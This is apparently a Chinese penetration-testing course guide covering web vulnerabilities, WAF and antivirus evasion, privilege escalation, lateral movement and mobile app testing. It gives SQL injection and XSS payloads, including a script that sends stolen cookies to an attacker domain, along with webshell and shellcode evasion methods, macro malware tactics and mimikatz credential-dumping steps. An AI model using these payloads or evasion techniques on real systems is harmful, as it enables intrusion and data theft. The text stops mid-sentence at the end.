小迪安全课件百度下载

小迪安全课件全面学习指南第一章网络安全基础与环境搭建网络安全基础概念网络协议基础深入理解互联网通信的底层机制是安全研究的起点。HTTP/HTTPS协议控制着Web应用的数据传输,TCP/IP协议栈则是整个互联网通信的基石。掌握这些协议的工作原理,能够帮助你更好地理解网络攻击的本质。HTTP请求与响应结构解析HTTPS加密通信与证书验证TCP三次握手与四次挥手IP地址与路由转发机制常见攻击类型简介了解攻击者的武器库是防御的前提。SQL注入通过恶意SQL语句窃取数据库信息,XSS跨站脚本攻击盗取用户凭证,CSRF跨站请求伪造利用用户身份执行恶意操作。这些经典攻击手法至今仍然威胁着大量Web应用。SQL注入:数据库攻击利器XSS:客户端脚本注入攻击CSRF:利用身份伪造请求Web应用架构与环境Web服务器与中间件Web服务器是应用运行的核心平台。IIS是Windows生态的首选,Apache和Nginx以高性能著称,Tomcat专门服务Java应用。不同服务器存在不同的安全特性和潜在漏洞。IIS配置与解析漏洞Apache/Nginx性能优化Tomcat弱口令与后台getshell数据库类型及应用数据库是Web应用的数据核心。MySQL广泛应用于中小型网站,Oracle服务大型企业系统,Redis提供高速缓存服务。每种数据库都有独特的注入方式和提权技巧。MySQL注入与读写文件Oracle注入利用技术Redis未授权访问利用服务器操作系统操作系统决定了服务器的安全边界。WindowsServer提供图形化管理,Linux系统以稳定性见长,MacOS服务器相对少见。不同系统的提权方法和防护策略各有特点。Windows权限管理机制Linux文件权限与SUID抓包技术与工具介绍抓包原理与流程抓包是渗透测试的眼睛,让我们能够看到客户端与服务器之间的所有通信细节。通过设置代理服务器,将浏览器的流量引导到抓包工具,我们可以拦截、修改、重放HTTP请求,发现隐藏的漏洞点。BurpSuite抓包实战BurpSuite是安全测试的瑞士军刀。它不仅能抓包,还集成了漏洞扫描、暴力破解、编码解码等强大功能。掌握Proxy、Repeater、Intruder等核心模块,能够大幅提升测试效率。HTTPS抓包证书配置HTTPS加密通信为抓包带来了挑战。要成功抓取HTTPS流量,需要在客户端安装BurpSuite的CA证书,建立中间人代理。配置步骤包括:启动BurpSuite代理监听,默认:8080浏览器配置代理指向BurpSuite访问http://burp下载CA证书将证书导入系统受信任根证书颁发机构重启浏览器,即可抓取HTTPS流量"抓包是渗透测试的第一步,没有流量分析就没有漏洞发现。BurpSuite让攻击者的每一次请求都无所遁形。"第二章信息收集与资产识别资产识别技术域名指纹识别与子域名爆破主域名只是冰山一角,大量子域名隐藏着测试环境、后台系统等高价值目标。使用Layer子域名挖掘机、subDomainsBrute等工具,通过字典爆破和DNS查询,可以发现大量被遗忘的资产。指纹识别通过分析HTTP响应头、页面特征判断CMS类型和版本。开源CMS及开发框架识别识别出WordPress、Dedecms、Thinkphp等常见CMS和框架,就能快速定位已知漏洞。WhatWeb、御剑指纹识别等工具通过特征匹配判断技术栈。某些CMS存在默认后台路径和弱口令,是快速getshell的捷径。端口扫描与服务识别CDN绕过与真实IP获取许多高价值目标使用CDN加速服务隐藏真实服务器IP。CDN通过将内容分发到全球节点,提供加速的同时也增加了攻击难度。绕过CDN获取真实IP是渗透测试的关键一步。01历史DNS记录查询目标网站可能在使用CDN前暴露过真实IP。通过SecurityTrails、微步在线等平台查询历史DNS解析记录,有机会找到真实IP。02子域名与邮件服务器探测部分子域名或邮件服务器可能没有使用CDN。通过mx记录查询、子域名扫描,可能发现与主站同机房的服务器,从而定位真实IP段。03全网扫描与证书匹配使用ZMap对全网443端口扫描,提取SSL证书信息。如果证书CN字段包含目标域名,很可能就是真实服务器。Censys、Shodan等搜索引擎也收录了大量证书数据。04社会工程学辅助定位通过目标公司的招聘信息、技术博客、Github代码泄露等,可能获取机房位置、IP段等关键信息。whois查询备案信息也能提供线索。漏洞扫描与蜜罐识别WAF防护识别与绕过技巧Web应用防火墙(WAF)是渗透测试的第一道障碍。阿里云盾、安全狗、ModSecurity等WAF通过规则匹配拦截恶意请求。识别WAF类型是制定绕过策略的前提。识别方法:提交特殊Payload如'or1=1--,观察返回的拦截页面特征。Wafw00f工具可自动识别WAF类型。绕过技巧:大小写混淆:SeLEcT代替select编码绕过:URL编码、Unicode编码注释分割:sel/**/ect等价函数替换:substring代替midHTTP参数污染:提交多个同名参数蜜罐陷阱识别案例蜜罐是安全团队部署的诱捕系统,看似存在漏洞实则记录攻击行为。攻击蜜罐可能导致真实身份暴露。识别特征:漏洞过于明显,如SQL注入单引号直接报错目录结构异常,缺少真实业务数据响应时间异常,数据库查询速度不合理开放大量高危端口如Telnet、FTP警惕:某些蜜罐会故意返回管理员密码等诱饵信息,诱导攻击者深入,切勿贪功冒进。实战中遇到可疑目标应及时停止测试。第三章Web攻防核心技术Web漏洞是互联网安全的重灾区。从SQL注入到XSS,从文件上传到命令执行,这些经典漏洞至今仍在威胁着无数网站。本章将深入剖析Web攻击的原理与利用技术,带你掌握实战中最有效的攻击手法。SQL注入漏洞详解SQL注入是Web安全的头号威胁,通过构造恶意SQL语句,攻击者可以绕过认证、读取敏感数据、甚至获取服务器权限。理解不同注入类型和利用技巧是每个安全从业者的必修课。注入类型全解析盲注通过真假判断逐字猜解数据。布尔盲注利用页面响应差异,如1'and1=1--返回正常,1'and1=2--返回异常。时间盲注利用sleep()延迟响应判断,如1'andsleep(5)--。报错注入通过构造错误语句让数据库报错显示信息,如updatexml()、extractvalue()函数。堆叠注入利用;分号执行多条语句,可创建用户、写入文件。Sqlmap自动化利用Sqlmap是SQL注入的终极武器。基础用法:sqlmap-u"目标URL"--batch自动检测。常用参数:--dbs列出所有数据库-D数据库名--tables列表-T表名--columns列字段--dump导出数据--os-shell获取系统shell--tamper绕过WAF进阶利用技术跨库查询:MySQL可通过information_schema库获取所有数据库信息,实现跨库注入。利用select*frommysql.user可读取数据库用户密码hash。二次注入:恶意数据第一次插入时被转义,但从数据库读取后未再过滤,导致二次利用。常见于修改密码、编辑资料等场景。跨站脚本攻击(XSS)三种XSS类型详解反射型XSS:恶意脚本包含在URL中,服务器直接返回。如搜索框输入<script>alert(1)</script>后页面执行。攻击者诱导受害者点击恶意链接触发。存储型XSS:恶意脚本存储在服务器,所有访问者都会触发。常见于评论、留言板。危害最大,可批量盗取Cookie。DOM型XSS:纯客户端漏洞,不经过服务器。JavaScript直接将用户输入插入DOM。如document.write(location.hash)可导致DOMXSS。绕过过滤技巧WAF和过滤机制试图拦截XSS,但总有绕过方法:大小写混淆:<ScRiPt>双写绕过:<scr<script>ipt>事件触发:<imgsrc=xonerror=alert(1)>编码绕过:<imgsrc=xonerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>换行绕过:%0a<script>alert(1)</script>Cookie盗取与CSP防护XSS最常见利用是盗取Cookie。通过<script>newImage().src='http://攻击者.com/?c='+document.cookie</script>可将Cookie发送到攻击者服务器。获得Cookie后可直接登录受害者账户。防护机制:HttpOnly标记使JavaScript无法读取Cookie。CSP(内容安全策略)限制脚本来源,阻止内联脚本执行。但CSP配置不当仍可绕过,如允许unsafe-inline或存在JSONP端点。文件上传与远程代码执行(RCE)文件上传漏洞成因开发者对上传文件类型校验不严,允许上传可执行脚本如PHP、JSP、ASP。攻击者上传Webshell后,可远程执行任意命令,完全控制服务器。黑白名单绕过白名单只允许特定后缀,可尝试双后缀shell.php.jpg、大小写shell.phP、解析漏洞shell.php.xxx。黑名单过滤不全,可用phtml、php5等后缀。免杀与隐藏技术WAF和杀软检测Webshell特征,需要免杀处理。加密编码:base64_decode、gzinflate解码执行。函数变形:assert、call_user_func动态调用。RCE命令执行除上传外,eval()、system()等函数也可能造成RCE。无回显时使用curl外带、DNS日志、sleep延迟等确认漏洞。反弹shell获得交互终端。实战技巧:上传图片马后配合文件包含漏洞、解析漏洞、.htaccess配置等getshell。中国菜刀、蚁剑、冰蝎等Webshell管理工具是后渗透利器。从信息收集到漏洞利用的攻防链条完整的渗透测试遵循系统化流程:信息收集识别攻击面→漏洞扫描发现薄弱点→漏洞验证确认可利用→权限获取控制系统→权限提升扩大战果→内网渗透横向移动→数据窃取达成目标→痕迹清理安全撤离。每个阶段环环相扣,前期信息收集越充分,后期攻击越精准。漏洞利用不是目的,获取敏感数据、证明安全风险才是核心价值。专业渗透测试必须遵守授权范围,在获得书面许可后方可实施。第四章权限提升与免杀对抗获得初始访问权限只是开始,从普通用户提升到管理员、从Webshell到系统Shell,权限提升是渗透深入的关键。同时,免杀技术让我们的工具能够绕过杀软检测,在实战中畅通无阻。本章揭秘提权与免杀的核心技术。权限提升技术1Windows本地提权Windows提权利用系统漏洞和错误配置。令牌窃取:通过incognito等工具窃取SYSTEM令牌,假冒高权限用户。UAC绕过:利用白名单程序如eventvwr.exe绕过用户账户控制。DLL劫持:程序加载DLL时未指定完整路径,将恶意DLL放在搜索路径前,实现劫持。服务提权:利用弱服务权限,替换服务可执行文件或修改服务路径。漏洞利用:MS17-010永恒之蓝、CVE-2019-0708蓝屏漏洞等系统漏洞是提权捷径。使用Metasploit的local_exploit_suggester模块自动寻找可利用漏洞。2Linux提权案例Linux提权需要深入理解权限机制。SUID滥用:查找设置了SUID位的可执行文件find/-perm-4000,利用nmap、vim等程序提权。内核漏洞:脏牛漏洞(CVE-2016-5195)等可直接提权到root。定时任务滥用:crontab定时任务以root运行,如果可写入任务配置,可执行恶意脚本。sudo配置错误:sudo-l查看可执行命令,利用通配符、环境变量注入等提权。密码破解:/etc/shadow存储密码hash,john、hashcat等工具可离线爆破。弱密码是提权常见突破口。3AD域控提权ActiveDirectory域环境是企业内网核心。Kerberoasting:请求服务票据,离线破解服务账户密码。AS-REPRoasting:对禁用预认证的账户进行攻击。黄金票据:伪造TGT票据,获取任意用户权限。白银票据:伪造TGS服务票据访问特定服务。DCSync:模拟域控制器,远程导出域用户hash。永恒之蓝:MS17-010漏洞在域环境中扩散极快,是内网渗透利器。BloodHound可视化域攻击路径,自动寻找到域控最短路径。免杀技术详解免杀的本质杀软通过特征码匹配、行为监控、沙箱检测等方式识别恶意代码。免杀就是对抗这些检测机制,让恶意代码看起来无害。静态免杀修改代码特征,动态免杀对抗行为分析。核心免杀技术Shellcode混淆:将原始shellcode进行XOR、AES加密,运行时动态解密。使用花指令、垃圾代码增加代码熵值,破坏特征匹配。PowerShell免杀:PowerShell是Windows原生工具,白利用难以检测。通过编码混淆、分段加载、内存注入等技术执行payload。Invoke-Obfuscation工具可自动混淆PS脚本。反沙盒技术:沙箱环境资源有限、时间短暂。通过检测CPU核心数、内存大小、运行时间、虚拟机特征等识别沙箱。检测到沙箱后终止运行或执行无害行为。反调试技术:检测调试器存在,如IsDebuggerPresent()、时间差检测、父进程检测等。发现调试器后终止进程或触发异常。免杀实战案例C/C++溯源绕过C编译生成的PE文件是木马常用载体。使用加壳工具如UPX、VMProtect保护程序,增加逆向难度。代码级免杀通过修改函数调用方式、字符串加密、动态导入API实现。分离式加载将shellcode与加载器分离,加载器从远程下载或本地读取加密的shellcode,内存中解密执行。进程注入技术将恶意代码注入到合法进程如explorer.exe,隐藏恶意行为。Python混淆与打包Python脚本易读易分析,需要深度混淆。PyArmor可加密py文件,Pyinstaller、py2exe打包成exe。但Python解释器特征明显,容易被杀软识别。进阶方案是将核心功能用C编写为pyd动态库,Python仅做调用。使用exec()、eval()动态执行字符串代码,配合base64、zlib等多层编码。内存执行技术直接在内存中运行bytecode,不落地磁盘。Office宏病毒免杀Office宏病毒通过诱导用户启用宏执行恶意VBA代码。宏免杀需要混淆VBA代码:字符串拼接、变量名随机化、代码分段执行。Auto_Open()自动执行宏,无需用户交互。宏代码可下载执行远程payload,或直接嵌入shellcode。使用msfvenom生成VBA格式shellcode,嵌入Word文档。DDE(动态数据交换)、公式注入等无宏利用方式更加隐蔽,但支持范围有限。免杀原则:不使用公开工具原始特征,自己编写加载器。每次行动使用不同的混淆方式,避免特征积累。定期在VirusTotal等平台检测免杀效果,但注意样本会被共享给杀软厂商。第五章内网安全与横向移动突破边界只是万里长征第一步,真正的宝藏藏在内网深处。从跳板机到核心服务器,从普通域用户到域管理员,内网渗透是层层深入的艺术。本章将揭示内网侦察、横向移动、域渗透的核心技术,带你征服企业内网。内网资产侦察进入内网后,首要任务是摸清网络拓扑、主机资产、域架构。信息收集越全面,后续攻击路径越清晰。主机信息收集Windows:ipconfig查看网卡IP,netuser查看本地用户,netlocalgroupadministrators查看管理员,systeminfo查看系统补丁,tasklist查看进程。Linux:ifconfig、ipaddr查看网络,whoami当前用户,cat/etc/passwd查看所有用户,psaux查看进程,crontab-l查看定时任务。域环境识别判断是否加入域:netconfigworkstation查看域名,echo%logonserver%查看域控。BloodHound是域侦察神器,通过LDAP查询自动绘制域攻击路径,找到到域管最短路径。Adfind:命令行AD查询工具,adfind-fobjectclass=computer导出所有计算机,adfind-scadmincounts查找高权限用户。PowerView:PowerShell域侦察模块,功能强大但易被检测。网络拓扑探测通过ARP扫描发现同网段主机,nbtscan扫描NetBIOS信息。内网端口扫描使用fscan、ladon等轻量工具,避免触发IDS告警。关注关键服务器:域控DC(88,389,636端口)、文件服务器(445端口)、数据库服务器(1433,3306端口)、邮件服务器(25,110,143端口)、OA办公系统(80,443端口)。防火墙规则与代理技术内网可能存在防火墙策略限制,某些主机无法直接访问。需要通过已控主机搭建代理或隧道。常用工具:frp内网穿透,EarthWorm(EW)多级代理,reGeorg正向Socks代理,Neo-reGeorg支持加密传输。配置Proxifier或Proxychains使本地工具通过代理访问内网。横向移动技术1SMB协议攻击SMB(445端口)是Windows文件共享协议。psexec:通过SMB远程执行命令,需要管理员权限。Pass-the-Hash:无需知道明文密码,使用NTLMhash即可认证,mimikatz可导出hash。永恒之蓝:MS17-010SMB漏洞,可直接getshell,内网传播极快。2WMI远程执行WMI是Windows管理工具,可远程执行命令。wmic/node:目标IP/user:用户/password:密码processcallcreate"cmd.exe"。WMI攻击无文件落地,隐蔽性强,但需要管理员权限和防火墙放行135端口。3Kerberos票据攻击黄金票据:获取krbtgt账户hash后,可伪造任意用户TGT票据,拥有整个域最高权限。白银票据:伪造特定服务TGS票据,如CIFS、HTTP服务。票据传递:导出当前用户Kerberos票据,注入到新进程实现权限切换。4NTLM中继攻击中间人劫持NTLM认证流量,将认证请求转发到目标服务器。Responder工具可进行LLMNR/NBT-NS欺骗,获取Net-NTLMv2hash。配合ntlmrelayx将认证中继到SMB、LDAP等服务,实现无密码横向。5域控DCSync攻击DCSync利用目录复制服务,模拟域控向另一个域控同步数据。使用mimikatz的lsadump::dcsync命令,可远程导出任意域用户的密码hash,包括krbtgt,进而伪造黄金票据。隧道搭建与通信隐蔽SSH隧道技术SSH是Linux标配,可搭建加密隧道。本地转发:ssh-L本地端口:目标:目标端口跳板机,将内网服务映射到本地。远程转发:ssh-R跳板端口:目标:目标端口,将本地服务暴露给内网。动态转发:ssh-D1080跳板机,建立Socks5代理,本地工具可通过此代理访问整个内网。SSH隧道加密传输,难以被检测。DNS隧道传输DNS流量通常不被拦截,可用于数据传输。dnscat2、iodine等工具将数据编码为DNS查询,通过公网DNS服务器与C2服务器通信。原理:控制的域名NS记录指向C2服务器,内网受控主机查询子域名(数据编码).,查询请求到达C2服务器,完成通信。传输速度慢但隐蔽性极强。ICMP隧道绕过ICMP(ping)协议常被忽视,可用于隐蔽通信。icmpsh、ptunnel等工具通过ICMPecho请求/响应传输数据,将shell命令和返回结果编码在ICMP包中。优点是ICMP流量较少被监控,防火墙一般放行。缺点是传输效率低,容易被流量分析发现异常。适合低频控制通信。反向连接:内网主机主动连接外网C2服务器,绕过防火墙入站限制。Metasploit的reverse_tcp、CobaltStrike的beacon都是反向连接。配合域前置、CDN等技术,可隐藏真实C2服务器IP。第六章移动端与APP攻防移动互联网时代,APP成为新的攻击面。从Android到iOS,从APP到小程序,移动安全有着独特的攻击技术和防护机制。本章将带你了解移动安全的核心知识,掌握APP渗透测试的关键技能。移动安全基础Android架构与安全Android基于Linux内核,应用运行在Dalvik/ART虚拟机中。APK文件本质是ZIP压缩包,包含DEX字节码、资源文件、签名信息。安全机制:沙箱隔离每个APP独立运行,权限系统控制敏感操作,代码签名验证APP完整性。但root后这些机制失效,给安全测试提供了便利。常见漏洞:组件暴露(Activity/Service/BroadcastReceiver/ContentProvider)可被恶意调用,WebView漏洞导致RCE,不安全的数据存储泄露敏感信息,代码混淆不足易被逆向。iOS架构与安全iOS基于Darwin内核,应用运行在沙箱中。IPA文件包含ARM二进制、资源、签名。iOS审核严格,安全性高于Android。安全机制:代码签名强制验证,沙箱限制文件访问,ASLR/DEP阻止代码注入,Keychain安全存储密钥。越狱(Jailbreak)破解系统限制,安装Cydia,获取root权限。常见漏洞:URLScheme劫持,NSUserDefaults不安全存储,Keychain访问控制不当,网络通信未使用证书绑定,二进制未混淆被逆向。反编译与混淆对抗Android反编译:apktool解包APK,dex2jar转换DEX为JAR,jd-gui反编译JAR查看源码。代码混淆使用ProGuard/R8,将类名方法名替换为a、b、c等无意义字符。iOS反编译:Clutch、frida-ios-dump砸壳脱去加密壳,class-dump导出类信息,Hopper/IDA反汇编分析逻辑。代码混淆工具如obfuscator-llvm、hikari增加逆向难度。对抗混淆:动态调试绕过混淆,静态分析寻找关键字符串,符号执行还原控制流,机器学习识别混淆模式。混淆增加难度但无法完全阻止逆向。APP抓包与证书绕过移动APP抓包是安全测试的基础,但HTTPS加密和证书校验给抓包带来了挑战。掌握抓包和证书绕过技术,能够让你看到APP与服务器之间的所有通信。01配置抓包代理手机和电脑连接同一WiFi,手机WiFi设置中配置HTTP代理指向电脑IP:8080。电脑启动BurpSuite或Charles监听8080端口。此时HTTP流量可被抓取,但HTTPS会报证书错误。02安装CA证书浏览器访问http://burp或/ssl下载证书。Android将证书安装到"受信任的凭据",iOS在设置-通用-描述文件安装后还需在设置-通用-关于本机-证书信任设置中启用。03绕过证书校验部分APP会进行SSLPinning证书绑定,只信任特定证书,拒绝代理证书。Xposed框架:安装JustTrustMe、SSLUnpinning模块全局绕过SSLPinning。Frida:注入JS脚本HookSSL验证函数,返回true绕过。04高级绕过技术某些APP检测代理、检测Xposed、多层加密。需要修改smali代码重打包,或使用VirtualXposed虚拟环境。网络层抓包用Wireshark、tcpdump抓取原始流量,配合密钥破解TLS。小程序安全小程序架构与反编译微信小程序基于JavaScript开发,运行在微信提供的环境中。小程序包wxapkg是加密的,但加密算法已被破解。解包工具:wxappUnpacker、unwxapkg可解密wxapkg,还原出wxml(结构)、wxss(样式)、js(逻辑)文件。通过解包可以查看小程序完整源码,分析业务逻辑和接口。动态调试:微信开发者工具打开解包后的代码,可以打断点调试,查看变量,修改逻辑。ChromeDevTools远程调试真机小程序,抓取网络请求。资产提取与接口安全资产提取:解包后可获取小程序内所有图片、音频、视频等资源文件。敏感信息如API密钥、服务器地址可能硬编码在JS中。接口安全检测:小程序通过wx.request调用后端接口,抓包分析接口参数、返回数据。常见问题:接口未做鉴权任意用户可调用,越权访问他人数据,敏感信息明文传输,业务逻辑漏洞如金额篡改、优惠券重复使用。防护建议:代码混淆、接口签名验证、服务端权限校验、敏感数据加密传输。但小程序前端本质是开放的,关键安全逻辑必须在服务端实现。第七章加密算法与安全防护加密是保护数据安全的核心技术,从简单的Base64编码到复杂的RSA非对称加密,理解加密算法的原理和应用场景是安全从业者的必备知识。本章将介绍常见加密算法,帮助你在渗透测试和安全防护中正确使用加密技术。常见加密算法解析编码算法Base64:将二进制数据编码为ASCII字符,常用于数据传输。Base64不是加密,可直接解码,等号填充是特征。URL编码:将特殊字符转换为%xx格式,用于URL参数传递。Hex编码:将字节转为十六进制表示,如0x41代表字母A。哈希算法MD5:生成128位(32字符)哈希值,已被碰撞攻击破解,不应用于安全场景。彩虹表可快速破解弱密码MD5。S